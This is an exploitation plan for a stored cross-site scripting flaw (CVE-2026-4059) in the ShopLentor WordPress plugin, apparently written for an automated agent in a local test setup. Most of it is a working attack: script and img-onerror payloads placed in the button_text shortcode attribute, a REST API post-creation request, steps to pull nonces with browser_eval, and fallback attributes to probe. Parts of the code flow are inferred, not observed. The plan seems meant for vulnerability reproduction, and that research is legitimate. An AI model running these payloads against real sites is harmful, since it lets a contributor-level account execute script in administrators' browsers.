Exploitation Research Plan: CVE-2026-4059

1. Vulnerability Summary

The ShopLentor (formerly WooLentor) plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the button_text attribute of the woolentor_quickview_button shortcode. In versions up to and including 3.3.5, the plugin fails to sanitize the attribute input and fails to escape it upon output. This allows authenticated users with Contributor-level permissions or higher to inject arbitrary JavaScript into pages.

2. Attack Vector Analysis

• Shortcode: [woolentor_quickview_button]
• Vulnerable Attribute: button_text
• Authentication Requirement: Contributor+ (any role allowed to create/edit posts).
• Precondition: The ShopLentor plugin must be active. WooCommerce usually needs to be active for "Quick View" buttons to function, but the rendering of the shortcode attribute often occurs regardless of WooCommerce state if the shortcode handler is registered.
• Endpoint: Standard WordPress post creation/editing via wp-admin/post.php or the REST API (/wp/v2/posts).

3. Code Flow

While the specific shortcode handler file (likely includes/shortcodes/class.quickview_button.php or similar) was not provided in the snippets, the architectural pattern in ShopLentor (visible in classes/class.widgets_control.php and includes/addons/wb_product_reviews.php) indicates a structure where attributes are extracted and rendered:

1. Registration: The plugin registers the shortcode using add_shortcode( 'woolentor_quickview_button', [ $this, 'render_shortcode' ] ).
2. Parsing: When a post is viewed, WordPress parses [woolentor_quickview_button button_text="PAYLOAD"].
3. Handler Execution: The handler receives the $atts array. Typically, it uses shortcode_atts() to merge defaults.
4. Vulnerable Sink: The code likely executes a statement similar to:

   // Inferred Vulnerable Logic:
   $button_text = $atts['button_text'];
   return '<button class="...">' . $button_text . '</button>'; 
   // OR
   echo '<button class="..." data-text="' . $button_text . '">';
   

5. Result: Because $button_text is neither sanitized via sanitize_text_field() during input nor escaped via esc_html() or esc_attr() during output, the payload executes in the victim's browser.

4. Nonce Acquisition Strategy

For Stored XSS via Shortcode Attributes, a specific plugin nonce is usually not required. The attacker utilizes the standard WordPress post-creation flow.

1. Context: The execution agent will act as a Contributor.
2. Standard Post Creation: WordPress core handles nonces for saving posts (_wpnonce in the post editor).
3. Bypass: If using the REST API, the agent needs the wp_rest nonce.
4. Action:
   • Navigate to wp-admin/post-new.php.
   • Use browser_eval to extract the _wpnonce for saving the post if using traditional form submission, or wp_rest nonce from window.wpApiSettings.nonce if using the REST API.

5. Exploitation Strategy

The goal is to create a post as a Contributor containing the malicious shortcode and verify that an Admin viewing the post triggers the script.

Step-by-Step Plan:

1. Login: Authenticate as a Contributor user.
2. Create Post: Send an HTTP request to create a new post with the malicious shortcode.
   • Payload 1 (Label Injection): [woolentor_quickview_button button_text="<script>alert('XSS_BY_SHORTCODE')</script>"]
   • Payload 2 (Attribute Breakout): [woolentor_quickview_button button_text='"><img src=x onerror=alert("XSS_BY_SHORTCODE")>']
3. Publish: Ensure the post status is publish (or pending if the agent needs an Admin to view it in the editor).
4. Trigger: Access the public URL of the created post.

HTTP Request Example (REST API):

POST /wp-json/wp/v2/posts HTTP/1.1
Host: localhost
Content-Type: application/json
X-WP-Nonce: [REST_NONCE]

{
  "title": "QuickView Test",
  "content": "[woolentor_quickview_button button_text='<script>console.log(\"Vulnerable_ShopLentor\")</script>']",
  "status": "publish"
}

6. Test Data Setup

1. User: Create a user with the contributor role.
   • wp user create attacker attacker@example.com --role=contributor --user_pass=password
2. Plugin State: Ensure woolentor-addons is active.
3. WooCommerce: Ideally, WooCommerce should be active as the "Quick View" functionality is tied to it, ensuring the shortcode logic is fully initialized.

7. Expected Results

1. The HTTP request to create the post returns 201 Created.
2. When navigating to the post URL (e.g., /?p=123), the HTML source contains the unescaped payload.
3. The browser executes the JavaScript (e.g., alert or console.log).

8. Verification Steps

1. Database Check: Use WP-CLI to confirm the content is stored raw.

   wp post list --post_type=post --fields=ID,post_content | grep "woolentor_quickview_button"
   

2. DOM Inspection: Use browser_navigate to the post and check for the injected tag:

   browser_eval("document.body.innerHTML.includes('XSS_BY_SHORTCODE')")
   

9. Alternative Approaches

If the button_text is rendered inside an Elementor Widget rather than a standard WordPress shortcode:

1. Elementor Editor Path: The vulnerability might manifest in the Elementor preview.
2. Draft Preview: Contributors can save drafts. An Admin reviewing the draft would trigger the XSS.
3. Other Attributes: If button_text is patched, check other attributes like product_id (if reflected) or class_name which are often processed similarly in the same shortcode handler.

Potential Localization Variables (if AJAX-based):

Based on classes/class.assest_management.php, look for:

• woolentor_addons_localize (Inferred from common plugin naming conventions).
• Check wp_localize_script calls in classes/class.assest_management.php (The provided source is truncated but reveals extensive script registration).
• Use browser_eval("window.woolentor_addons_localize") to find any nonces if an AJAX-based shortcode rendering occurs.